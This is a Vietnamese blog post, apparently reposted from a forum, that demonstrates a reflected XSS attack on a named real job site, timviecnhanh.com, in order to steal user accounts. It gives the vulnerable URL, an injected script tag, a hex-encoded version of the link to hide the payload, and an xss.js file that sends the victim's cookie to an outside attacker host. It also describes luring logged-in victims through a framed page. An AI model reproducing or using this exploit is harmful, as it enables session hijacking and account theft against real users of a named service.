Trao đổi với tôi

www.hdphim.info

2/6/10

[Hacking] Demo: Đánh cắp tài khoản timviecnhanh.com thông qua XSS

Link khai thác tại:

Code:

http://www.timviecnhanh.com/careeradvice/?newsid=1004&cat=

Đây là lỗi tương đối phổ biến trên các ứng dụng web hiện nay. Do lỗi không kiểm tra và lọc các biến truyền vào nên có thể chèn vào các thông tin không cần thiết như bao gồm script, form nhằm đánh cắp thông tin, thực thi các tác vụ không mong muốn.
Ở đây ta chèn 1 script redirect cookie của victim về host định sẵn. Victim sẽ mất cookie khi nhấn vào link có chèn script này:

Code:

http://www.timviecnhanh.com/careeradvice/?newsid=104&cat=>'><ScRiPt src=http://cehlab.com/xss/xss.js></script>

Link sau khi chuyển sang Hex:

Code:

http://www.timviecnhanh.com/careeradvice/?newsid=1004&cat=%3E%27%3E%3C%53%63%52%69%50%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%63%65%68%6C%61%62%2E%63%6F%6D%2F%78%73%73%2F%78%73%73%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E

File xss.js:

Code:

location.href='http://cehlab.com/xss/luu.php?cookie='+escape(document.cookie);

Thay vì gửi link trực tiếp user, tôi sẽ hướng victim về 1 website khác, trong đó dùng thẻ FRAME với link trên. Khi victim truy cập vào trang này cookie sẽ được chuyển.
Khai thác:
1. Victim truy cập vào timviecnhanh.com, đăng nhập.
2. Victim truy cập vào trang attacker thiết lập, cookie timviecnhanh sẽ tự chuyển về host này.
DEMO
(4MB - Các bạn chờ vài phút để load phim)
Chúc vui!


Reflink: http://nhatnghe.com/forum/showthread.php?t=23100

No comments:

Post a Comment